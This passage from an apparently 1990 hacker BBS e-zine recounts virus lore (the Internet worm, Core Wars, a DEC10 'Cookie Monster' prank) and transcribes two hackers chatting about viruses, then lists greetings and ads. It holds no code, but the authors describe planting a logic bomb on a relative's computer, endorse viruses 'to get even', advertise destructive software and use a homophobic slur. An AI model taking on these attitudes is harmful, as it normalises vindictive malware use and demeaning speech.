more than an experiment gone bad. The funny part is that Robert Jr,. father
Robert Sr,. in which he turned to the next day after the infection, was
the top security specialist and help design the UNIX operating system.
The whole thing was nothing more than experiment that a bad bug, but yet
much data was consumed because of it. This was the first virus to come to
the attention of the general public.
Core Wars...........
==========================================
This was a definite begining of where the thought of the danger
of computer viruses got started. Core Wars was a game, and the object was for
two programs be set inside a machine and these two programs would
try to destroy each other. Usually by three methods.
1. Mobiltity - A program could move about, their by eluding direct hits.
2. Defense - A program could take a fit and repair itself.
3. Offense - Get it before it gets you.
The creator of Core War soon relized that 'what if one other these
programs escaped from the game and spead to other users?'. He relized
that you could renender anything from SDI to lottus 1-2-3 useless. For
More information on Core Wars and these battle machines, refer to ....
'Virus!'
By Allan Lundell
Contemporary Books, Chicago - New York
or
'Computer Viruses,Worms,Data Diddlers,Killers programs and other threats
to your system.'
By John McAfee (Chairman of the Computer Vir. Industry Ass.)
Forward Press.
These books contain exellent information on viruses, and protection.
Virus Discussion between two hackers...........
Conducted on Jan. 7, 1990: 2 A.M in the morning.
================================================
(Nut-Kracker=KN Beaver=BV)
KN: When I think of viruses, I tend to think of AIDs, I mean do you really
Think AIDs would have spread in the 1750's even if there were drug
users or fags, of course not, simple because that there were not that
many people. If there were 2 million people in American, it would have
never have spread. Much is the same with with computers. More people
use them, there every were, in the home and government. If there weren't
so many computers, do you really think that viruses would even be a
discussion. Hell, no. If I had told you 7 years ago that you could get
a computer virus, would you have believed me.
BV: No, I would have probably laught at you, but of course if you explained
it I would have seen the threat. Mostly because I already knew about
trojan horses.
KN: Exactly, its a pretty scary thought. At the rate the world is going with
computers, I can see very little use for phones, besides can you talk
at 19.2k baud.
BV: HA, cant say I can, but I dont see use dropping the fone idea anytime
soon.
KN: Of course not, it wouldn't be for a while, but everything around you
is becomimg more and more dependent on computers, and where computers
are, there is a threat. Hell , in 10 years a virus will be nothing, more
advanced method will come around.
BV: Or just more advanced methods of virus creating.
I can see a major threat with the government using virus, which they current
probably use anyway.
KN: Hell, with computers, the third world war could be thought behind a
keyboard, there will be no need for guns and solders even though we
will still have them.
BV: I think the ultimate virus would be one that could pass software to
biological. ( I snicker at the thought )
KN: Don't laugh, think of that Biotech VAX off of University of Florida's
eithernet!
BV: Shit, never thought about that......
KN: Think of when parent can decide what they want they what there kid to
be. No parent whats his kid to have a kid with a hereitary disease.
If you can decide what sex, hair color, etc you what it to be, why not
a disease?
BV: True, but I dont see that happening anytime soon.
KN: About 30 year is my guess, of course they do test now for some diseases.
BV: Ahhhh, data munipulation, say by 1/2. That is half the positive kids that
come out with say cancer, you tell it to say they are negitive, ehh?
KN: Exactly. They would probably be aborted anywway. This is a virus shooting
out of the monitor but it could happen
BV: (I think: I dont see this in wide use yet though.)
(But they do test for some stuff? is it possible.)
Ha! here goes one! what if a virus hit a AI computer! would it feel it?...
...... If it were true AI, of course it would.
KN: What if you infected a AI system to become suicidal!
BV: Actually, self replication is a big positive step for AI, in that it
Doesn't rely on user input.
Just think of govermnet agencies using viruses.
KN: Yeah, computers launch and track missles, cause they dont use fuses anymore
, (HA!). What if that system was infected with a virus from Iran they
start to send bombs and all are computers will do is say 'The Iatolahoman
Rules!' (HA)
BV: (HA) But that would take some incredible effort, I hope there up on that
and Im sure there aware of the threat.
KN: Nothing is impossible.
( From here we talk about U.S. voting and viruses for a while and
various stuff)
KN: I think the ultimate virus could adapt to its enviorment on any system.
BV: I see execution problems though.
KN: True, you could write in all OS codes....
BV: That would be easy to identify!Plus you would still have execution problems
KN: Yeah, but I see a day when there becomes a nessecity to have a standard
OS, I mean look at the metric system.
BV: We are already adapting to that, besides look at the internet virus, it
infected both SUNs systems along with VAXes running under UNIX.
KN: I even see a BIG general network, that everyone uses.
BV: But you would have to keep the military and the private sectors on two
different nets.
KN: Look at say, tymnet, through time net you can get to another net, and
so on and so on, theres already, basicly speaking a , several general
nets.
I mean, look at the things you can get too from these nets!
BV: I can see larger bussiness using this 'net' but not small ones.
KN: Why not? with one phone call you call access you bank, bussiness, or
the stock market, or what ever you need.
BV: Of course you know thats how the internet virus spead, was via net via
net.
KN: Its scary to think that I could create a virus that could infect VAXes
under UNIX, it could spread....look how far we get going through
net to net till we ended up in Boston or some place. What, didn't that
internet virus use anonymous in its master password list?
BV: Yes, with in the first twenty trys I believe.
KN: It would have easily made it to that companys system!!!!
BV: Yep!
KN: I can only hope one day that people will learn to respect the computer
they operate on and other peoples computer and not destroy anything.
BV: the only terms I would use a virus under would be to get even or get
what I need. Thats pretty unrespossible. You can't tell me you wouldn't.
KN: I never denied that, but look at guns, they have been around thousands
of years, and they are sometime not respected, and computers never will
be either. The internet virus was nothing more than an experiment gone
bad.
BV: Yeah, one little error can screw up alot, but he was an exellent
programmer never the less.
KN: yeah, I would never write a virus to destroy a cancer institute, but
look at the guys from the 414's, they did it on accident.
(That was how the 414's , a hacking group, down fall came around )
KN: I respect the computers, but sometime not the people sitting behind them
, I would never fuck with patience files that could kill them for fun
or even alter the out come on a geneticly scaned disease. That un-called
for. Then again, I could fuck up, but thats the risk.
BV: Ulitmately, there is no perfect anti-virus, virus, security, etc.
KN: Thats what makes progress......
BV: As Prof. Cohen once stated 'There is no security'.
(Thats basicly haw the discussion went)
As this discussion ended late in the night, we chated about a few
other things and then wrote a simple logic bomb to pester the Nut-Krackers
computer illiterate brother so he couldn't play his favorite games.
We will tell him how to get rid of it, but he deserves it.............
All he ever does is play games, and it looks like he is getting a new
Apple GS when he should be getting a Nintendo, while his old brother
the Nut-Kracker, is stuck with the old machine he programs on, word processes
and telecomunicates through........ But at least his brother will get to
play some neat game.....God, that makes me sick.
The Legendary Cookie Monster.....
============================================
Once upon a time on a big, nifty computer system called a DEC10, a neat
program was let go. It only effected certain people in the network, by
displaying the message 'I WANT A COOKIE!'. If the poor user didn't type
'cookie' fast enough, all his data was set into never never land. But
if the users did type 'cookie' the program would let him go on, and if
he type 'OREO!' it wouldn't bother him for weeks on end
This Text was written in full by 'The Beaver', if you have any questions
comments, or would like more information on pirating,phone phreaking,viruses,hac
king, or just feel like insulting me ,please, drop e-mail at.....
'The Hurrican Hole'
(XXX)XXX-XXXX
Look for other text files created by various users on the BBS in the
'tally-online' doors section, and other files written by myself (Virus
discussion: Details on how viruses work) and other up-coming file. Also
Thanx to the excellent Hacker, Pirate, and Programmer, The Nut-Kracker
for his views and neat ideas on the virus......
(November 8, 1989) The Beaver : Member of SH/CA
Well, thats it for the first issue, and don't expect every one to
be as large as this one. I just thought since it was the first, it shoud be
a nice big fat one to keep you reading for a while. If you have any questions,
insults, threats or comments, please E-mail 'The Beaver'.
Special thanx, once again, too -> The Nut-Kracker for the company
hacking all the nets, The Baron, Highwayman, Mentalist off of UFnet, members
of the 'CIA' in boston off of that bussiness net in boston, Pink Floyd, All
the members of SH/CA, Copy cat, Special Forces, Chaos Control, Cool Breeze,
Paul, Eric, Steve, my Dad, Abiagal, The Shadow for DEC hacking lately, Members
of the soon to be strong 'H.Korner!' and all TLH,Fl hackers (what few there
are).
Also No-Thanx To -> Doug, and all the Sysops who are
members of the NFSA, with the
exception of a very few!
________________________________________________________________________________
Look For The Latest software from the SH/CA
and GrindLock Software(c)
SH/CA ToolBox (v3.1) * COMING SOON, VERSION 3.0!
ReMap Util. (1.0)
The IBM Home Destruction Set! (v1.3) * COMING SOON, VERSION 2.0!
To obtain these and other fine software, call 'The Reactor' (904)878-1736!
________________________________________________________________________________
The Next Issue Subjects..........
Editorial By 'The Beaver'
Very Basic Hacking By 'The Beaver'.
Part II of the IBM destruction 'The Beaver and
other people.'
Part II of hack DECservers By 'The Beaver and
the Shadow'.
And much, much more!
________________________________________________________________________________
---==<Beaver>==---
Member
SH/CA
(c)1990
Reference in New Issue View Git Blame Copy Permalink